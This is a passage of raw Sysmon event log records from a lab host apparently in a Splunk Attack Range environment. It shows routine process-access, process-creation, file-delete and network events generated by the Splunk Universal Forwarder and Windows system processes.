Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.287{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.287{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.287{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.287{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.287{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-5030-613A-8990-03000000C801}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.286{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-5030-613A-8990-03000000C801}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.272{B81B27B7-5030-613A-8990-03000000C801}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:29.290{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=396F28D9445A6D5EAC651A1CB545E277,SHA256=729CA2425B53FCF09469627542855BF9F27BA13BD09C1DDFE5790EE5A14F493F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:29.289{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=367A0C9140F2AB753EBAAE89DD4E8ADC,SHA256=7E733C063BE1F972B0067AAA0AACB29EEC53D6606E2A97DBE3A4AB5184CED493,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:53.216{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56842-false10.0.1.12-8000-